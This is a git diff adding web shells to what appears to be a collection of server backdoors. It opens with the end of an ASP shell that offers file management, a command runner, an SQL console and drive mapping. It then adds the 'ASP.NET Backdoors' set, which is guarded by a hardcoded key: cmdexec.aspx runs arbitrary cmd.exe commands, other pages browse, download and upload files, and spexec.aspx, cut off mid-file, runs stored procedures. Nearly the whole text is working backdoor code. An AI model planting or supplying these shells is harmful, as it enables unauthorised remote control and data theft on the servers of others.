+Response.Write "</table>"
+Response.Write "<BR>&nbsp;</BR>"
+Response.Write "</div>"
+
+
+Response.Write "<div align=""center"">"
+Response.Write "<font id=""ffNo"" style=""font-weight:bold;color:orange;display:none;"">Total : <span style=""color:red;"" id=""totalFolders"">0</span> folder(s) and <span style=""color:red;"" id=""totalFiles"">0</span> file(s)<BR><span style=""color:red;"" id=""folderNo"">0</span> folder(s) and <span style=""color:red;"" id=""fileNo"">0</span> file(s) listed !&nbsp;&nbsp;&nbsp;<input type=""button"" id=""btLoadmore"" onClick=""loadMore();"" value=""[Load More]"" style=""display:none;font-weight:bold;""></font><BR>&nbsp;"
+Response.Write "<table id=""tblContent"" cellpadding=""0px"" cellspacing=""1px"" width=""95%"" style=""border:1px solid #5d5d5d;min-width:1280;"">"
+Response.Write "<thead width=""100%"" class=""tableHead"" align=""center"">"
+Response.Write "<tr>"
+Response.Write "	<TD class=""fname""><b>Name</b></TD>"
+Response.Write "	<TD class=""fsize""><b>Size</b></TD>"
+Response.Write "	<TD class=""ftype""><b>Type</b></TD>"
+Response.Write "	<TD class=""fdate""><b>Date Last Modified</b></TD>"
+Response.Write "	<TD class=""fdate""><b>Date Created</b></TD>"
+Response.Write "	<TD class=""faction"" colspan=""3""><b>Action</b></TD>"
+Response.Write "</tr>"
+Response.Write "</thead>"
+Response.Write "<tbody id=""tblList"" bgcolor=""#3a3a3a"">"
+Response.Write "</tbody>"
+Response.Write "<tbody id=""tblCommand"" width=""100%"">"
+Response.Write "<tr>"
+Response.Write "	<TD>&nbsp;</TD>"
+Response.Write "	<TD></TD>"
+Response.Write "	<TD></TD>"
+Response.Write "	<TD></TD>"
+Response.Write "	<TD></TD>"
+Response.Write "	<TD align=""center""><input type='checkbox' title='Select All' class='xcheck' name='checkboxAll' onClick='checkAll(this);' value='all'></TD>"
+Response.Write "	<TD align=""center""><input type=""button"" onClick=""Delete();"" value=""Delete &raquo;"" style=""font-weight:bold;""></TD>"
+Response.Write "	<TD></TD>"
+Response.Write "</tr>"
+Response.Write "</tbody>"
+Response.Write "<tbody width=""100%"">"
+Response.Write "<tr>"
+Response.Write "	<TD><input type=""button"" onClick=""newFolder();"" value=""New Folder &raquo;"" style=""font-weight:bold;"">&nbsp;&nbsp;&nbsp;<input type=""button"" onClick=""newFile();"" value=""New File &raquo;"" style=""font-weight:bold;"">&nbsp;&nbsp;&nbsp;<input type=""button"" onClick=""window.location.href='#Upload|'+ffList.info.path.addSlash();"" value=""Upload &raquo;"" style=""font-weight:bold;""></TD>"
+Response.Write "<form onSubmit=""CopyMove('copy', getId('remoteCopy').value);return false;"">"
+Response.Write "	<TD align=""right"" colspan=""2"">Copy selected item(s) to :</TD>"
+Response.Write "	<TD colspan=""2""><input name=""remoteCopy"" id=""remoteCopy"" value='' type=""text"" style=""width:250px;""><input type=""submit"" value=""Go &raquo;"" style=""width:50; font-weight:bold;""></TD>"
+Response.Write "</form>"
+Response.Write "	<TD colspan=""3""></TD>"
+Response.Write "</tr>"
+Response.Write "</tbody>"
+Response.Write "<tbody  width=""100%"">"
+Response.Write "<tr>"
+Response.Write "	<TD>&nbsp;</TD>"
+Response.Write "<form onSubmit=""CopyMove('move', getId('remoteMove').value);return false;"">"
+Response.Write "	<TD align=""right"" colspan=""2"">Move selected item(s) to :</TD>"
+Response.Write "	<TD colspan=""2""><input name=""remoteMove"" id=""remoteMove"" value='' type=""text"" style=""width:250px;""><input type=""submit"" value=""Go &raquo;"" style=""width:50; font-weight:bold;""></TD>"
+Response.Write "</form>"
+Response.Write "	<TD colspan=""3""></TD>"
+Response.Write "</tr>"
+Response.Write "</tbody>"
+Response.Write "</table>"
+Response.Write "</div>"
+
+
+Response.Write "<div align=""center"">"
+Response.Write "<table id=""tblPicture"" style=""display:none"" align=""center"" width=""95%""><TR><TD align='center' class=""kbrtm""><A href=""javascript:showMode('Explorer', true);"">[Back to Browser]</A></TD></TR><tr><td align='center' class=""kbrtm""><img id=""imgPicture"" src=""" & FilePath & "?mode=image&imgId=loading""></td></tr></table>"
+Response.Write "<BR>&nbsp;</BR>"
+Response.Write "</div>"
+
+Response.Write "<div id=""tblFileEdit"" style=""display:none"" align=""center"">"
+Response.Write "<form method=""post"" onSubmit=""saveFile();return false;"">"
+Response.Write "<table class=""kbrtm"">"
+Response.Write "<TR><TD align='center'><A href=""javascript:showMode('Explorer', true);"">[Back to Browser]</A></TD></TR>"
+Response.Write "<tr>"
+Response.Write "<td align=""center"">"
+Response.Write "<b>Edit file : <font color=orange id=""lblFile"">"&folderLocation&"</font></b><br>"
+Response.Write "<textarea name=""txtContent"" id=""txtContent"" style='width:800;height:600;'>"
+Response.Write ""
+Response.Write "</textarea>"
+Response.Write "<br><br><input type=submit value="":: Save ::""><br></td></tr><tr><td align=""center"">"
+Response.Write "</td></tr></table></form>"
+Response.Write "</div>"
+
+
+Response.Write "<div id=""tblUpload"" style=""display:none"" align=""center"">"
+Response.Write "<table width=""600"">"
+Response.Write "<TR><TD align='center' class=""kbrtm""><A href=""javascript:showMode('Explorer', true);"">[Back to Browser]</A></TD></TR>"
+Response.Write "<tr><td class=""kbrtm"" align=""center"">Location : <b><font color=orange id=""uploadLocation""></font></b></td></tr>"
+Response.Write "<tr><td align=""center"" class=""kbrtm"">"
+Response.Write "<form name=""frmUpload"" method=""post"" enctype=""multipart/form-data"" action=""" & FilePath & "?mode=upload"" ID=""frmUpload"">"
+Response.Write "<input type=hidden name=""linkBack"" id=""linkBack"" value=""#"">"
+Response.Write "<input type=hidden name=""location"" value="""" ID=""txtuploadLocation"">"
+Response.Write "Max: <input type=""text"" name=""max"" value=""1"" size=""2"" ID=""idMax""> <input type=""button"" value=""Set"" onclick=""setid();"">"
+Response.Write "<table>"
+Response.Write "<tr>"
+Response.Write "<td id=""upid"">"
+Response.Write "</td>"
+Response.Write "</tr>"
+Response.Write "</table>"
+Response.Write "<input type=submit value=""::  Upload  ::"">"
+Response.Write "</form>"
+Response.Write "<script>"
+Response.Write "setid();"
+Response.Write "function setid() {"
+Response.Write "    str='';"
+Response.Write "    if (getId('frmUpload').max.value<=0) getId('frmUpload').max.value=1;"
+Response.Write "    if (getId('frmUpload').max.value > 10) getId('frmUpload').max.value=10;"
+Response.Write "    for (i=1; i<=getId('frmUpload').max.value; i++) str+='File '+i+': <input size=30 type=file name=file'+i+'><br>';"
+Response.Write "    getId('upid').innerHTML=str+'<br>';"
+Response.Write "}"
+Response.Write "</script>"
+Response.Write "</td></tr></table>"
+Response.Write "</div>"
+
+Response.Write "<div id=""tblCmd"" style=""display:none"" align=""center"">"
+Response.Write "<form onSubmit=""runCMD();return false;"" method=""post"">"
+Response.Write "<table class=""kbrtm"">"
+Response.Write "<TR><TD align='center'><A href=""javascript:showMode('Explorer', true);"">[Back to Browser]</A></TD></TR>"
+Response.Write "<TR><TD align='center'><b>Command : </b><input style='color=#DAFDD0' name=""vcommand"" id=""vcommand"" size='57' value='ipconfig /all' type='text'><input value="".: Run :."" type='submit'></TD></TR>"
+Response.Write "<tr>"
+Response.Write "<td align=""center"">"
+Response.Write "<textarea name=""txtCmdResult"" id=""txtCmdResult"" style='width:650;height:400;'>"
+Response.Write "</textarea>"
+Response.Write "</td></tr></table></form>"
+Response.Write "</div>"
+
+Response.Write "<div id=""tblSql"" style=""display:none"" align=""center"">"
+Response.Write "<form onSubmit=""runSQL();return false;"" method=""post"">"
+Response.Write "<table class=""kbrtm"">"
+Response.Write "<TR><TD align='center' colspan='4' class=""kbrtm""><A href=""javascript:showMode('Explorer', true);"">[Back to Browser]</A></TD></TR>"
+Response.Write "<TR>"
+Response.Write "<TD><b>Connection String : </b></TD><TD colspan='3'><input style='color=#DAFDD0' name=""sqlconnection"" id=""sqlconnection"" size='121' value='Provider=SQLOLEDB;Data Source=127.0.0.1;database=master;uid=sa;pwd=;' type='text'></TD>"
+Response.Write "</TR>"
+Response.Write "<TR>"
+Response.Write "<TD valign='top'><b>SQL Command : </b></TD><TD valign='top'><input type=""button"" id=""commandChange"" onClick=""sqlCommandChange();"" value="" <-> ""></TD>"
+Response.Write "<TD><input style='color=#DAFDD0' name=""sqlcommand"" id=""sqlcommand"" size='100' value='SELECT TOP 1000 * FROM information_schema.tables' type='text'><textarea name=""txtsqlcommand"" id=""txtsqlcommand"" style='display:none;width:620px;height:150px;'>SELECT TOP 1000 * FROM information_schema.tables</textarea></TD>"
+Response.Write "<TD valign='top'><input type=""submit"" value="":: Run ::""></TD></TR>"
+Response.Write "<TR>"
+Response.Write "<TD colspan='4' align=""center""><b><font color=orange id=""affected"">0</font> row(s) <span id=""lstAff"">listed</span> !</b></TD>"
+Response.Write "</TR>"
+Response.Write "</table>"
+Response.Write "</form>"
+Response.Write "<P>&nbsp;</P>"
+
+Response.Write "<table class=""kbrtm"" id=""sqlContent"" width=""95%"">"
+Response.Write "</table>"
+
+Response.Write "</div>"
+
+
+Response.Write "<div align=""center"">"
+Response.Write "<table id=""tblDrivers"" cellpadding=""0"" cellspacing=""0"" width=""200""><TBODY>"
+Response.Write "<tr><td class=""kbrtm"" style=""background-color:121212"" align=""center""><b>Drivers</b></td></tr>"
+Response.Write driversText
+Response.Write "<tr id=""addMapNetwork""><td class=""kbrtm"" align=""center""><a href=""javascript:showMapNetwork();"">[ + ]</a></td></tr>"
+Response.Write "</TBODY></table>"
+Response.Write "</div>"
+
+Response.Write "<P>&nbsp;</P>"
+Response.Write "</div>"
+
+Response.Write "<div id=""tblMenu"" align=""center""><BR>&nbsp;"
+Response.Write "<table cellpadding=""0"" cellspacing=""0"" height=""25""><tr><td class=""kbrtm1"">&nbsp;&nbsp;&nbsp;<a href=""javascript:showMode('Explorer', true);""><b>* Home *</B> </a> | <a href=""#SQL""><b>* SQL *</b></a> | <a href='#CMD'><b>* CMD *</b></a>&nbsp;&nbsp;&nbsp;</td></tr></table><br>"
+Response.Write "</div>"
+
+Response.Write "<div id=""tblMapDriver"" align=""center"">"
+Response.Write "<form onSubmit=""mapDriver();return false;"" method=""post"">"
+Response.Write "<table class=""kbrtm"">"
+Response.Write "<TR><TD align='center' colspan=""2""><A href=""javascript:hideMapNetwork();"">[Back to Browser]</A></TD></TR>"
+Response.Write "<TR><TD align='center'>Driver Letter : </TD><TD><input style='color=#DAFDD0' id=""driverLetter"" size='2' value='X' type='text'></TD></TR>"
+Response.Write "<TR><TD align='center'>Remote Share : </TD><TD><input style='color=#DAFDD0' id=""remoteShare"" size='40' value='\\Server\Share' type='text'></TD></TR>"
+Response.Write "<TR><TD align='center'>Username :</TD><TD><input style='color=#DAFDD0' id=""userName"" size='40' value='WORKGROUP\Administrator' type='text'></TD></TR>"
+Response.Write "<TR><TD align='center'>Password : </TD><TD><input style='color=#DAFDD0' id=""password"" size='40' value='1234567890' type='text'></TD></TR>"
+Response.Write "<tr><td align=""center"" colspan=""2""><input value="".: Map :."" type='submit'></td></tr>"
+Response.Write "</table></form>"
+Response.Write "</div>"
+
+Response.Write "<div id=""overlay"">"
+Response.Write "</div>"
+
+Response.Write "<div id=""tblLoading"" align=""center"">"
+Response.Write "<table width=""200"" height=""100"" style=""background:#303030;border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;"" cellpadding=""0"" cellspacing=""0"" border=""0""><tr><td align=""center"" valign=""middle""><img src=""?mode=image&imgId=loading""></td></tr></table>"
+Response.Write "</div>"
+
+Response.Write "</body>"
+Response.Write "</html>"
+%>
\ No newline at end of file
diff --git a/aspx/asp.net-backdoors/ChangeLog.txt b/aspx/asp.net-backdoors/ChangeLog.txt
new file mode 100644
index 00000000..0506d5d0
--- /dev/null
+++ b/aspx/asp.net-backdoors/ChangeLog.txt
@@ -0,0 +1,52 @@
+
+
+  ASP.NET Backdoors
+
+  Copyright (c) 2012 woanware
+  Developed by Mark Woan (markwoan[at]gmail.com)
+
+  ---------------------------------------------------------------------------
+  
+  Change Log
+  ----------
+  
+  v1.3.0
+  ------
+  - Added an auth key parameter, so that you can password protect each of the 
+    pages. Modify the constant located at the top of each file. The 
+    filesystembrowser.aspx file needs you to initially specify the "authkey=XXX" 
+    parameter value
+  
+  v1.2.0
+  ------
+  - Added spexec.aspx allows you to dynamically load SQL Server stored 
+    procedures and associated parameters, then execute the SP
+  
+  v1.1.0
+  ------
+  - Added sql.aspx which allows you to execute SQL statements
+  
+  v1.0.2
+  ------
+  - MikeA has kindly modified filesystembrowser.aspx and fileupload.aspx so that
+    if the application renames the files on upload, the functionality still
+    works, since I had hardcoded the filenames
+  
+  v1.0.1
+  ------
+  - Added extra validation to filesystembrowser.aspx to catch errors when 
+    assigning a default drive. Thanks foob for the feedback
+  
+  v1.0.0
+  ------
+  - Initial Public Release
+
+  ---------------------------------------------------------------------------
+
+  woanware
+  http://www.woanware.co.uk/
+
+  
+
+
+
diff --git a/aspx/asp.net-backdoors/cmdexec.aspx b/aspx/asp.net-backdoors/cmdexec.aspx
new file mode 100644
index 00000000..15a825cd
--- /dev/null
+++ b/aspx/asp.net-backdoors/cmdexec.aspx
@@ -0,0 +1,96 @@
+<%@ Page Language="C#" %>
+<%@ Import namespace="System.Diagnostics"%>
+<%@ Import Namespace="System.IO" %>
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+
+<script runat="server">
+    private const string AUTHKEY = "woanware";
+
+    private const string HEADER = "<html>\n<head>\n<title>command</title>\n<style type=\"text/css\"><!--\nbody,table,p,pre,form input,form select {\n font-family: \"Lucida Console\", monospace;\n font-size: 88%;\n}\n-->\n</style></head>\n<body>\n";
+    private const string FOOTER = "</body>\n</html>\n";
+
+    /// <summary>
+    /// 
+    /// </summary>
+    /// <param name="sender"></param>
+    /// <param name="e"></param>
+    protected void Page_Load(object sender, EventArgs e)
+    {
+    }
+
+    /// <summary>
+    /// 
+    /// </summary>
+    /// <param name="sender"></param>
+    /// <param name="e"></param>
+    protected void btnExecute_Click(object sender, EventArgs e)
+    {
+    	if (txtAuthKey.Text != AUTHKEY)
+    	{
+    	    return;
+	    }
+			
+        Response.Write(HEADER);
+        Response.Write("<pre>");
+        Response.Write(Server.HtmlEncode(this.ExecuteCommand(txtCommand.Text)));
+        Response.Write("</pre>");
+        Response.Write(FOOTER);
+    }
+
+    /// <summary>
+    /// 
+    /// </summary>
+    /// <param name="command"></param>
+    /// <returns></returns>
+    private string ExecuteCommand(string command)
+    {
+        try
+        {
+            ProcessStartInfo processStartInfo = new ProcessStartInfo();
+            processStartInfo.FileName = "cmd.exe";
+            processStartInfo.Arguments = "/c " + command;
+            processStartInfo.RedirectStandardOutput = true;
+            processStartInfo.UseShellExecute = false;
+
+            Process process = Process.Start(processStartInfo);
+            using (StreamReader streamReader = process.StandardOutput)
+            {
+                string ret = streamReader.ReadToEnd();
+
+                return ret;
+            }
+        }
+        catch (Exception ex)
+        {
+            return ex.ToString();
+        }
+    }
+</script>
+
+<html xmlns="http://www.w3.org/1999/xhtml" >
+<head id="Head1" runat="server">
+    <title>Command</title>
+</head>
+<body>
+    <form id="formCommand" runat="server">
+    <div>
+        <table>
+            <tr>
+                <td width="30">Auth Key:</td>
+		        <td><asp:TextBox id="txtAuthKey" runat="server"></asp:TextBox></td>
+            </tr>
+            <tr>
+                <td width="30">Command:</td>
+                <td><asp:TextBox ID="txtCommand" runat="server" Width="820px"></asp:TextBox></td>
+            </tr>
+                <td>&nbsp;</td>
+                <td><asp:Button ID="btnExecute" runat="server" OnClick="btnExecute_Click" Text="Execute" /></td>
+            </tr>
+        </table>
+    </div>
+    </form>
+</body>
+</html>
+
+<!-- Created by Mark Woan (http://www.woanware.co.uk) -->
\ No newline at end of file
diff --git a/aspx/asp.net-backdoors/filesystembrowser.aspx b/aspx/asp.net-backdoors/filesystembrowser.aspx
new file mode 100644
index 00000000..01ffe140
--- /dev/null
+++ b/aspx/asp.net-backdoors/filesystembrowser.aspx
@@ -0,0 +1,207 @@
+<%@ Page Language="C#" %>
+<%@ Import namespace="System.Diagnostics"%>
+<%@ Import Namespace="System.IO" %>
+<%@ Import Namespace="System.Text" %>
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+
+<script language="c#" runat="server">
+    private const string AUTHKEY = "woanware";
+    private const string HEADER = "<html>\n<head>\n<title>filesystembrowser</title>\n<style type=\"text/css\"><!--\nbody,table,p,pre,form input,form select {\n font-family: \"Lucida Console\", monospace;\n font-size: 88%;\n}\n-->\n</style></head>\n<body>\n";
+    private const string FOOTER = "</body>\n</html>\n";
+
+    /// <summary>
+    /// 
+    /// </summary>
+    /// <param name="sender"></param>
+    /// <param name="e"></param>
+    protected void Page_Load(object sender, EventArgs e)
+    {
+        try
+        {
+	        if (Request.Params["authkey"] == null)
+            {
+            	return;
+            }
+            
+            if (Request.Params["authkey"] != AUTHKEY)
+	        {
+	            return;
+            }
+            
+            if (Request.Params["operation"] != null)
+            {
+                if (Request.Params["operation"] == "download")
+                {
+                    Response.Write(HEADER);
+                    Response.Write(this.DownloadFile());
+                    Response.Write(FOOTER);
+                }
+                else if (Request.Params["operation"] == "list")
+                {
+                    Response.Write(HEADER);
+                    Response.Write(this.OutputList());
+                    Response.Write(FOOTER);
+                }
+                else
+                {
+                    Response.Write(HEADER);
+                    Response.Write("Unknown operation");
+                    Response.Write(FOOTER);
+                }
+            }
+            else
+            {
+                Response.Write(HEADER);
+                Response.Write(this.OutputList());
+                Response.Write(FOOTER);
+            }
+        }
+        catch (Exception ex)
+        {
+            Response.Write(HEADER);
+            Response.Write(ex.Message);
+            Response.Write(FOOTER);
+        }
+    }
+
+    /// <summary>
+    /// 
+    /// </summary>
+    private string DownloadFile()
+    {
+        try
+        {
+            if (Request.Params["file"] == null)
+            {
+                return "No file supplied";
+            }
+
+            string file = Request.Params["file"];
+
+            if (File.Exists(file) == false)
+            {
+                return "File does not exist";
+            }
+
+            Response.ClearContent();
+            Response.ClearHeaders();
+            Response.Clear();
+            Response.ContentType = "application/octet-stream";
+            Response.AddHeader("Content-Disposition", "attachment; filename=" + Path.GetFileName(file));
+            Response.AddHeader("Content-Length", new FileInfo(file).Length.ToString());
+            Response.WriteFile(file);
+            Response.Flush();
+            Response.Close();
+
+            return "File downloaded";
+        }
+        catch (Exception ex)
+        {
+            return ex.ToString();
+        }
+    }
+
+    /// <summary>
+    /// 
+    /// </summary>
+    private string OutputList()
+    {
+        try
+        {
+            StringBuilder response = new StringBuilder();
+
+            string dir = string.Empty;
+
+            if (Request.Params["directory"] == null)
+            {
+                string[] tempDrives = Environment.GetLogicalDrives();
+                if (tempDrives.Length > 0)
+                {
+                    for (int index = 0; index < tempDrives.Length; index++)
+                    {
+                        try
+                        {
+                            dir = tempDrives[index];
+                            break;
+                        }
+                        catch (IOException){}
+                    }
+                }
+            }
+            else
+            {
+                dir = Request.Params["directory"];
+            }
+
+            if (Directory.Exists(dir) == false)
+            {
+                return "Directory does not exist";
+            }
+            
+            // Output the auth key textbox
+            response.Append("<table><tr>");
+            response.Append(@"<td><asp:TextBox id=""txtAuthKey"" runat=""server""></asp:TextBox></td>");
+            response.Append("</tr><tr><td>&nbsp;<td></tr></table>");
+
+            // Output the available drives
+            response.Append("<table><tr>");
+            response.Append("<td>Drives</td>");
+
+            string[] drives = Environment.GetLogicalDrives();
+            foreach (string drive in drives)
+            {
+                response.Append("<td><a href=");
+                response.Append("?directory=");
+                response.Append(drive);
+                response.Append("&authkey=" + Request.Params["authkey"]);
+                response.Append("&operation=list>");
+                response.Append(drive);
+                response.Append("</a></td>");
+            }
+
+            // Output the current path
+            response.Append("</tr></table><table><tr><td>&nbsp;</td></tr>");
+            response.Append("<tr><td>..&nbsp;&nbsp;&nbsp;<a href=\"?directory=");
+
+            string parent = dir;
+            DirectoryInfo parentDirInfo = Directory.GetParent(dir);
+            if (parentDirInfo != null)
+            {
+                parent = parentDirInfo.FullName;
+            }
+
+            response.Append(parent);
+            response.Append("&authkey=" + Request.Params["authkey"]);
+            response.Append("&operation=list\">");
+            response.Append(parent);
+            response.Append("</a></td></tr></table><table>");
+
+            // Output the directories
+            System.IO.DirectoryInfo dirInfo = new System.IO.DirectoryInfo(dir);
+            foreach (System.IO.DirectoryInfo dirs in dirInfo.GetDirectories("*.*"))
+            {
+                response.Append("<tr><td>dir&nbsp;&nbsp;<a href=\"?directory=" + dirs.FullName + "&authkey=" + Request.Params["authkey"] + "&operation=list\">" + dirs.FullName + "</a></td></tr>");
+            }
+
+            // Output the files
+            dirInfo = new System.IO.DirectoryInfo(dir);
+            foreach (System.IO.FileInfo fileInfo in dirInfo.GetFiles("*.*"))
+            {
+                response.Append("<tr><td>file&nbsp;<a href=\"?file=" + fileInfo.FullName + "&authkey=" + Request.Params["authkey"] + "&operation=download\">" + fileInfo.FullName + "</a></td><td>");
+                response.Append(fileInfo.Length);
+                response.Append("</td></tr>");
+            }
+
+            response.Append("</table>");
+
+            return response.ToString();
+        }
+        catch (Exception ex)
+        {
+            return ex.ToString();
+        }
+    }
+</script>
+
+<!-- Created by Mark Woan (http://www.woanware.co.uk) -->
diff --git a/aspx/asp.net-backdoors/fileupload.aspx b/aspx/asp.net-backdoors/fileupload.aspx
new file mode 100644
index 00000000..0058f095
--- /dev/null
+++ b/aspx/asp.net-backdoors/fileupload.aspx
@@ -0,0 +1,126 @@
+<%@ Page Language="C#" %>
+<%@ Import Namespace="System.IO" %>
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+
+<script runat="server">
+    private const string AUTHKEY = "woanware";
+    private const string HEADER = "<html>\n<head>\n<title>filesystembrowser</title>\n<style type=\"text/css\"><!--\nbody,table,p,pre,form input,form select {\n font-family: \"Lucida Console\", monospace;\n font-size: 88%;\n}\n-->\n</style></head>\n<body>\n";
+    private const string FOOTER = "</body>\n</html>\n";
+
+    /// <summary>
+    /// 
+    /// </summary>
+    /// <param name="sender"></param>
+    /// <param name="e"></param>
+    protected void Page_Load(object sender, EventArgs e)
+    {
+        try
+        {
+            if (Request.Params["authkey"] == null)
+            {
+                Response.Write(HEADER);
+                Response.Write(this.GetUploadControls());
+                Response.Write(FOOTER);
+                return;
+            }
+
+            if (Request.Params["authkey"] != AUTHKEY)
+            {
+                Response.Write(HEADER);
+                Response.Write(this.GetUploadControls());
+                Response.Write(FOOTER);
+                return;
+            }
+            
+            if (Request.Params["operation"] != null)
+            {
+                if (Request.Params["operation"] == "upload")
+                {
+                    Response.Write(HEADER);
+                    Response.Write(this.UploadFile());
+                    Response.Write(FOOTER);
+                }
+                else
+                {
+                    Response.Write(HEADER);
+                    Response.Write("Unknown operation");
+                    Response.Write(FOOTER);
+                }
+            }
+            else
+            {
+                Response.Write(HEADER);
+                Response.Write(this.GetUploadControls());
+                Response.Write(FOOTER);
+            }
+        }
+        catch (Exception ex)
+        {
+            Response.Write(HEADER);
+            Response.Write(ex.Message);
+            Response.Write(FOOTER);
+        }
+    }
+
+    /// <summary>
+    /// 
+    /// </summary>
+    private string UploadFile()
+    {
+        try
+        {
+            if (Request.Params["authkey"] == null)
+            {
+                return string.Empty;
+            }
+
+            if (Request.Params["authkey"] != AUTHKEY)
+            {
+                return string.Empty;
+            }
+            
+            if (Request.Files.Count != 1)
+            {
+                return "No file selected";
+            }
+
+            HttpPostedFile httpPostedFile = Request.Files[0];
+
+            int fileLength = httpPostedFile.ContentLength;
+            byte[] buffer = new byte[fileLength];
+            httpPostedFile.InputStream.Read(buffer, 0, fileLength);
+
+            FileInfo fileInfo = new FileInfo(Request.PhysicalPath);
+            using (FileStream fileStream = new FileStream(Path.Combine(fileInfo.DirectoryName, Path.GetFileName(httpPostedFile.FileName)), FileMode.Create))
+            {
+                fileStream.Write(buffer, 0, buffer.Length);
+            }
+
+            return "File uploaded";
+        }
+        catch (Exception ex)
+        {
+            return ex.ToString();
+        }
+    }
+
+    /// <summary>
+    /// 
+    /// </summary>
+    /// <returns></returns>
+    private string GetUploadControls()
+    {
+        string temp = string.Empty;
+
+        temp = "<form enctype=\"multipart/form-data\" action=\"?operation=upload\" method=\"post\">";
+        temp += "<br>Auth Key: <input type=\"text\" name=\"authKey\"><br>";
+        temp += "<br>Please specify a file: <input type=\"file\" name=\"file\"></br>";
+        temp += "<div><input type=\"submit\" value=\"Send\"></div>";
+        temp += "</form>";
+
+        return temp;
+    }
+</script>
+
+<!-- Created by Mark Woan (http://www.woanware.co.uk) -->
diff --git a/aspx/asp.net-backdoors/spexec.aspx b/aspx/asp.net-backdoors/spexec.aspx
new file mode 100644
index 00000000..9736009b
--- /dev/null
+++ b/aspx/asp.net-backdoors/spexec.aspx
@@ -0,0 +1,367 @@
+<%@ Page Language="C#" %>
+<%@ Import namespace="System.Data"%>
+<%@ Import namespace="System.Data.SqlClient"%>
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+
+<script runat="server" language="c#">
+    private const string AUTHKEY = "woanware";
+    
+    /// <summary>
+    /// 
+    /// </summary>
+    /// <param name="sender"></param>
+    /// <param name="e"></param>
+    protected void btnLogin_Click(object sender, EventArgs e)
+    {
+        SqlConnection sqlConnection = null;
+
+        try
+        {
+            if (txtAuthKey.Text != AUTHKEY)
+            {
+                return;
+            }
+            
+            sqlConnection = new SqlConnection();
+
+            sqlConnection.ConnectionString = "Data source=" + txtDatabaseServer.Text +
+                                             ";User id=" + txtUserId.Text +
+                                             ";Password=" + txtPassword.Text +
+                                             ";Initial catalog=" + txtDatabase.Text;
+            sqlConnection.Open();
+
+            SqlCommand sqlCommand = null;
+            SqlDataAdapter sqlDataAdapter = null;
+
+            sqlCommand = new SqlCommand("sp_stored_procedures", sqlConnection);
+            sqlCommand.CommandType = CommandType.StoredProcedure;
+
+            sqlDataAdapter = new SqlDataAdapter(sqlCommand);
+
+            lblStatus.Text = string.Empty;
+
+            DataSet dataSet = new DataSet();
+
+            sqlDataAdapter.Fill(dataSet, "SPs");
+
+            cboSps.DataSource = dataSet.Tables["SPs"];
+            cboSps.DataTextField = "PROCEDURE_NAME";
+            cboSps.DataBind();
+        }
+        catch (SqlException sqlEx)
+        {
+            lblStatus.Text = sqlEx.Message;
+        }
+        catch (Exception ex)
+        {
+            lblStatus.Text = ex.Message;
+        }
+        finally
+        {
+            if (sqlConnection != null)
+            {
+                sqlConnection.Dispose();
+            }
+        }
+    }
+
+    /// <summary>
+    /// 
+    /// </summary>
+    /// <param name="sender"></param>
+    /// <param name="e"></param>
+    protected void btnGetParameters_Click(object sender, EventArgs e)
+    {
+        SqlConnection sqlConnection = null;
+
+        try
+        {
+            if (txtAuthKey.Text != AUTHKEY)
+            {
+                return;
+            }
+            
+            sqlConnection = new SqlConnection();
+
+            sqlConnection.ConnectionString = "Data source=" + txtDatabaseServer.Text +
+                                             ";User id=" + txtUserId.Text +
+                                             ";Password=" + txtPassword.Text +
+                                             ";Initial catalog=" + txtDatabase.Text;
+
+            SqlCommand sqlCommand = new SqlCommand("sp_sproc_columns", sqlConnection);
+            sqlCommand.CommandType = CommandType.StoredProcedure;
+
+            SqlDataAdapter sqlDataAdapter = new SqlDataAdapter(sqlCommand);
+
+            lblStatus.Text = string.Empty;
+            sqlCommand.CommandType = CommandType.StoredProcedure;
+            sqlCommand.Parameters.Add("@procedure_name", SqlDbType.NVarChar, 390).Value = cboSps.SelectedItem.Value;
+
+            DataSet dataSet = new DataSet();
+
+            sqlDataAdapter.Fill(dataSet, "Parameters");
+
+            gridParameters.DataSource = dataSet.Tables["Parameters"];
+            gridParameters.DataBind();
+
+            gridResults.Visible = false;
+        }
+        catch (SqlException sqlEx)
+        {
+            lblStatus.Text = sqlEx.Message;
+        }
+        finally
+        {
+            if (sqlConnection != null)
+            {
+                sqlConnection.Dispose();
+            }
+        }
+    }
+
+    /// <summary>
+    /// 
+    /// </summary>
+    /// <param name="sender"></param>
+    /// <param name="e"></param>
+    protected void btnExecute_Click(object sender, EventArgs e)
+    {
+        SqlConnection sqlConnection = null;
+
+        try
+        {
+            if (txtAuthKey.Text != AUTHKEY)
+            {
+                return;
+            }
+            
+            sqlConnection = new SqlConnection();
+
+            sqlConnection.ConnectionString = "Data source=" + txtDatabaseServer.Text +
+                                             ";User id=" + txtUserId.Text +
+                                             ";Password=" + txtPassword.Text +
+                                             ";Initial catalog=" + txtDatabase.Text;
+
+            DataSet dataSet = new DataSet();
+
+            SqlCommand sqlCommand = new SqlCommand(cboSps.SelectedItem.Value, sqlConnection);
+
+            SqlDataAdapter sqlDataAdapter = new SqlDataAdapter(sqlCommand);
+
+            lblStatus.Text = string.Empty;
+
+            sqlCommand.CommandType = CommandType.StoredProcedure;
+
+            this.AddParameters(sqlCommand);
+
+            sqlDataAdapter.Fill(dataSet, "Results");
+
+            this.UpdateParameters(sqlCommand);
+
+            gridResults.DataSource = dataSet.Tables["Results"];
+            gridResults.DataBind();
+            gridResults.Visible = true;
+        }
+        catch (SqlException sqlEx)
+        {
+            lblStatus.Text = sqlEx.Message;
+        }
+        finally
+        {
+            if (sqlConnection != null)
+            {
+                sqlConnection.Dispose();
+            }
+        }
+    }
+
+    /// <summary>
+    /// 
+    /// </summary>
+    /// <param name="sqlCommand"></param>
+    private void AddParameters(SqlCommand sqlCommand)
+    {
+        foreach (DataGridItem dataGridItem in gridParameters.Items)
+        {
+            if (((TableCell)dataGridItem.Controls[5]).Text != "5")
+            {
+                switch (((TableCell)dataGridItem.Controls[1]).Text.ToLower())
+                {
